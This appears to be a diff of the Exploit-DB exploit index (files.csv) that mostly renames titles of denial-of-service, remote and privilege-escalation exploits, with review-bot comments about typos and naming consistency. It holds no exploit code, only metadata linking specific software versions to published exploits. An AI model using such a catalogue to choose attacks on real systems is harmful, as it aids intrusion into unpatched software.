22220,platforms/windows/dos/22220.pl,"ByteCatcher FTP Client 1.0.4 - Long Server Banner Buffer Overflow",2003-02-04,"Dennis Rand",windows,dos,0 22220,platforms/windows/dos/22220.pl,"ByteCatcher FTP Client 1.0.4 - Long Server Banner Buffer Overflow",2003-02-04,"Dennis Rand",windows,dos,0
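Review bot: 22207 is rewritten here but the misspelling "Managment" is carried from the old description into the new one ("3ware Disk Managment 1.10 - HTTP Request Denial of Service"); since the line is already being touched, correct it to "Management" in this change rather than leaving it for a second cleanup commit.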
@ -2850,7 +2850,7 @@ id,file,description,date,author,platform,type,port
22582,platforms/windows/dos/22582.pl,"Youngzsoft CMailServer 4.0 - RCPT TO Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos,0 22582,platforms/windows/dos/22582.pl,"Youngzsoft CMailServer 4.0 - RCPT TO Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos,0
22585,platforms/windows/dos/22585.pl,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (1)",2003-05-11,"Matthew Murphy",windows,dos,0 22585,platforms/windows/dos/22585.pl,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (1)",2003-05-11,"Matthew Murphy",windows,dos,0
22586,platforms/windows/dos/22586.c,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (2)",2003-05-11,rash,windows,dos,0 22586,platforms/windows/dos/22586.c,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (2)",2003-05-11,rash,windows,dos,0
22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - Malformed GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0 22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0
22591,platforms/windows/dos/22591.txt,"Microsoft Excel 2007 - WriteAV Crash (PoC)",2012-11-09,coolkaveh,windows,dos,0 22591,platforms/windows/dos/22591.txt,"Microsoft Excel 2007 - WriteAV Crash (PoC)",2012-11-09,coolkaveh,windows,dos,0
22596,platforms/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service",2003-05-08,"Lorenzo Cerulli and Fabio Annunziato",hardware,dos,0 22596,platforms/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service",2003-05-08,"Lorenzo Cerulli and Fabio Annunziato",hardware,dos,0
22602,platforms/palm_os/dos/22602.c,"PalmOS 3/4 - ICMP Flood Remote Denial of Service",2003-05-14,"Shaun Colley",palm_os,dos,0 22602,platforms/palm_os/dos/22602.c,"PalmOS 3/4 - ICMP Flood Remote Denial of Service",2003-05-14,"Shaun Colley",palm_os,dos,0
@ -3068,7 +3068,7 @@ id,file,description,date,author,platform,type,port
23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0 23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0
23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",windows,dos,0 23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",windows,dos,0
23602,platforms/windows/dos/23602.txt,"mIRC 6.1 - DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",windows,dos,0 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 - DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",windows,dos,0
23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0 23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0
23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x - Missing Host Field Denial of Service",2004-02-11,"Luigi Auriemma",windows,dos,0 23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x - Missing Host Field Denial of Service",2004-02-11,"Luigi Auriemma",windows,dos,0
23689,platforms/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service",2004-02-12,gsicht,windows,dos,0 23689,platforms/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service",2004-02-12,gsicht,windows,dos,0
23690,platforms/linux/dos/23690.txt,"XFree86 4.x - CopyISOLatin1Lowered Font_Name Buffer Overflow",2004-02-12,"Greg MacManus",linux,dos,0 23690,platforms/linux/dos/23690.txt,"XFree86 4.x - CopyISOLatin1Lowered Font_Name Buffer Overflow",2004-02-12,"Greg MacManus",linux,dos,0
@ -3318,7 +3318,7 @@ id,file,description,date,author,platform,type,port
25076,platforms/linux/dos/25076.c,"PostgreSQL 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0 25076,platforms/linux/dos/25076.c,"PostgreSQL 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0
25077,platforms/linux/dos/25077.txt,"Newspost 2.0/2.1 - Remote Buffer Overflow",2005-02-01,"Niels Heinen",linux,dos,0 25077,platforms/linux/dos/25077.txt,"Newspost 2.0/2.1 - Remote Buffer Overflow",2005-02-01,"Niels Heinen",linux,dos,0
25081,platforms/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c - UDP Processing Remote Denial of Service",2005-04-29,"Donato Ferrante",multiple,dos,0 25081,platforms/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c - UDP Processing Remote Denial of Service",2005-04-29,"Donato Ferrante",multiple,dos,0
25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - Malformed HTTP POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0
25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure",2005-02-05,"Donato Ferrante",windows,dos,0 25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure",2005-02-05,"Donato Ferrante",windows,dos,0
25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos,0 25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos,0
25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0 25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0
@ -3922,7 +3922,7 @@ id,file,description,date,author,platform,type,port
31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 - 'DELE' Command Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos,0 31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 - 'DELE' Command Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos,0
31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution / Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0 31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution / Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0
31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0 31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0
31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - HTTP POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0
31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String and Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String and Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0
31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0 31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0
31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0 31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0
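Review bot: the two Larson entries in the unchanged context of this hunk place the "(LstNPS)" qualifier inconsistently: 31138 reads "Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' ..." while 31139 reads "Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function ...". Since this commit is normalising titles anyway, moving the qualifier in 31139 before the " - " separator to match 31138 would keep the product name identical across both rows.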
@ -4015,7 +4015,7 @@ id,file,description,date,author,platform,type,port
31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow",2008-06-04,"Dennis Rand",windows,dos,0 31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow",2008-06-04,"Dennis Rand",windows,dos,0
31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation",2008-06-03,"Dennis Rand",windows,dos,0 31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation",2008-06-03,"Dennis Rand",windows,dos,0
31879,platforms/windows/dos/31879.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete",2008-06-03,"Dennis Rand",windows,dos,0 31879,platforms/windows/dos/31879.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete",2008-06-03,"Dennis Rand",windows,dos,0
31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router - Malformed HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0 31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router - HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0
31889,platforms/novell/dos/31889.pl,"Novell Groupwise Messenger 2.0 Client - Buffer Overflow",2008-07-02,"Francisco Amato",novell,dos,0 31889,platforms/novell/dos/31889.pl,"Novell Groupwise Messenger 2.0 Client - Buffer Overflow",2008-07-02,"Francisco Amato",novell,dos,0
31899,platforms/windows/dos/31899.txt,"VideoLAN VLC Media Player 2.1.3 - '.avs' Crash (PoC)",2014-02-25,kw4,windows,dos,0 31899,platforms/windows/dos/31899.txt,"VideoLAN VLC Media Player 2.1.3 - '.avs' Crash (PoC)",2014-02-25,kw4,windows,dos,0
31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0 31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0
@ -4285,7 +4285,7 @@ id,file,description,date,author,platform,type,port
40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0 40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0
40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0 40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0
34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80 34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80
33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
33968,platforms/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial of Service",2010-05-10,"Usman Saeed",windows,dos,0 33968,platforms/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial of Service",2010-05-10,"Usman Saeed",windows,dos,0
33924,platforms/windows/dos/33924.py,"RealVNC 4.1.3 - 'ClientCutText' Message Remote Denial of Service",2010-05-02,"John Leitch",windows,dos,0 33924,platforms/windows/dos/33924.py,"RealVNC 4.1.3 - 'ClientCutText' Message Remote Denial of Service",2010-05-02,"John Leitch",windows,dos,0
@ -4336,7 +4336,7 @@ id,file,description,date,author,platform,type,port
34364,platforms/linux/dos/34364.html,"Qt 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption",2010-07-13,D4rk357,linux,dos,0 34364,platforms/linux/dos/34364.html,"Qt 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption",2010-07-13,D4rk357,linux,dos,0
34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0
34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",linux,dos,0 34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",linux,dos,0
34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - HTTP GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0 34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0
34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",windows,dos,0 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",windows,dos,0
34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos,0 34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos,0
34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0
@ -9131,6 +9131,7 @@ id,file,description,date,author,platform,type,port
42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0 42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -12597,9 +12598,9 @@ id,file,description,date,author,platform,type,port
21484,platforms/windows/remote/21484.c,"Yahoo! Messenger 5.0 - Call Center Buffer Overflow",2002-05-27,bob,windows,remote,0 21484,platforms/windows/remote/21484.c,"Yahoo! Messenger 5.0 - Call Center Buffer Overflow",2002-05-27,bob,windows,remote,0
21485,platforms/windows/remote/21485.txt,"Microsoft Windows 95/98/2000/NT 4.0 - WinHlp Item Buffer Overflow",2002-05-27,"Next Generation Security",windows,remote,0 21485,platforms/windows/remote/21485.txt,"Microsoft Windows 95/98/2000/NT 4.0 - WinHlp Item Buffer Overflow",2002-05-27,"Next Generation Security",windows,remote,0
21488,platforms/novell/remote/21488.txt,"Netscape Enterprise Web Server for Netware 4/5 5.0 - Information Disclosure",2002-05-29,Procheckup,novell,remote,0 21488,platforms/novell/remote/21488.txt,"Netscape Enterprise Web Server for Netware 4/5 5.0 - Information Disclosure",2002-05-29,Procheckup,novell,remote,0
21490,platforms/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 21490,platforms/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0
21491,platforms/multiple/remote/21491.txt,"Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 21491,platforms/multiple/remote/21491.txt,"Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure",2002-05-29,"Richard Brain",multiple,remote,0
21492,platforms/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 21492,platforms/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree",2002-05-29,"Richard Brain",multiple,remote,0
21650,platforms/windows/remote/21650.txt,"Microsoft SQL Server 2000 - Database Consistency Checkers Buffer Overflow",2002-07-25,"Cesar Cerrudo",windows,remote,0 21650,platforms/windows/remote/21650.txt,"Microsoft SQL Server 2000 - Database Consistency Checkers Buffer Overflow",2002-07-25,"Cesar Cerrudo",windows,remote,0
21510,platforms/windows/remote/21510.pl,"Microsoft Internet Explorer 5/6 / Microsoft ISA Server 2000 / Microsoft Proxy Server 2.0 Gopher Client - Buffer Overflow",2002-07-27,mat@monkey.org,windows,remote,0 21510,platforms/windows/remote/21510.pl,"Microsoft Internet Explorer 5/6 / Microsoft ISA Server 2000 / Microsoft Proxy Server 2.0 Gopher Client - Buffer Overflow",2002-07-27,mat@monkey.org,windows,remote,0
21511,platforms/multiple/remote/21511.c,"Nullsoft SHOUTcast 1.8.9 - Remote Buffer Overflow",2002-06-04,eSDee,multiple,remote,0 21511,platforms/multiple/remote/21511.c,"Nullsoft SHOUTcast 1.8.9 - Remote Buffer Overflow",2002-06-04,eSDee,multiple,remote,0
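Review bot: the new title for 21492 introduces a typo, "Information Disclosuree" (double e); it should read "Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosure", matching the sibling entry 21490 rewritten in the same hunk.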
@ -12759,10 +12760,10 @@ id,file,description,date,author,platform,type,port
21940,platforms/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",windows,remote,0 21940,platforms/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",windows,remote,0
21942,platforms/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",multiple,remote,0 21942,platforms/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",multiple,remote,0
21944,platforms/hardware/remote/21944.pl,"Cisco CatOS 5.x/6.1/7.3/7.4 - CiscoView HTTP Server Buffer Overflow",2002-10-16,blackangels,hardware,remote,0 21944,platforms/hardware/remote/21944.pl,"Cisco CatOS 5.x/6.1/7.3/7.4 - CiscoView HTTP Server Buffer Overflow",2002-10-16,blackangels,hardware,remote,0
21945,platforms/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Malformed Request Remote Buffer Overflow",2002-10-17,"securma massine",linux,remote,0 21945,platforms/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow",2002-10-17,"securma massine",linux,remote,0
21947,platforms/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 - Cross-Site Scripting",2002-10-23,Rapid7,unix,remote,0 21947,platforms/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 - Cross-Site Scripting",2002-10-23,Rapid7,unix,remote,0
21948,platforms/unix/remote/21948.txt,"IBM Websphere Edge Server 3.69/4.0 - HTTP Header Injection",2002-10-23,Rapid7,unix,remote,0 21948,platforms/unix/remote/21948.txt,"IBM Websphere Edge Server 3.69/4.0 - HTTP Header Injection",2002-10-23,Rapid7,unix,remote,0
21955,platforms/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - Malformed SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,windows,remote,0 21955,platforms/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,windows,remote,0
21958,platforms/windows/remote/21958.txt,"AOL Instant Messenger 4.8.2790 - Local File Execution",2002-10-22,"Blud Clot",windows,remote,0 21958,platforms/windows/remote/21958.txt,"AOL Instant Messenger 4.8.2790 - Local File Execution",2002-10-22,"Blud Clot",windows,remote,0
21959,platforms/windows/remote/21959.txt,"Microsoft Internet Explorer 5/6 - Cached Objects Zone Bypass",2002-10-22,"GreyMagic Software",windows,remote,0 21959,platforms/windows/remote/21959.txt,"Microsoft Internet Explorer 5/6 - Cached Objects Zone Bypass",2002-10-22,"GreyMagic Software",windows,remote,0
21964,platforms/windows/remote/21964.txt,"SolarWinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",windows,remote,0 21964,platforms/windows/remote/21964.txt,"SolarWinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",windows,remote,0
@ -13352,7 +13353,7 @@ id,file,description,date,author,platform,type,port
24120,platforms/linux/remote/24120.c,"LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0 24120,platforms/linux/remote/24120.c,"LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0
24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0 24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0
24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0
24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0
24133,platforms/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0 24133,platforms/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0 24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0
24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0 24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0
@ -13704,7 +13705,7 @@ id,file,description,date,author,platform,type,port
25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0 25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0
25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - Remote Code Execution (SEH)",2013-05-30,xis_one,windows,remote,0 25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - Remote Code Execution (SEH)",2013-05-30,xis_one,windows,remote,0
25841,platforms/windows/remote/25841.txt,"Yaws 1.5x - Source Code Disclosure",2005-06-17,"Daniel Fabian",windows,remote,0 25841,platforms/windows/remote/25841.txt,"Yaws 1.5x - Source Code Disclosure",2005-06-17,"Daniel Fabian",windows,remote,0
25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - Malformed HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0 25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0
25851,platforms/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 - db_netserver Stack Buffer Overflow (Metasploit)",2013-05-31,Metasploit,windows,remote,8001 25851,platforms/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 - db_netserver Stack Buffer Overflow (Metasploit)",2013-05-31,Metasploit,windows,remote,8001
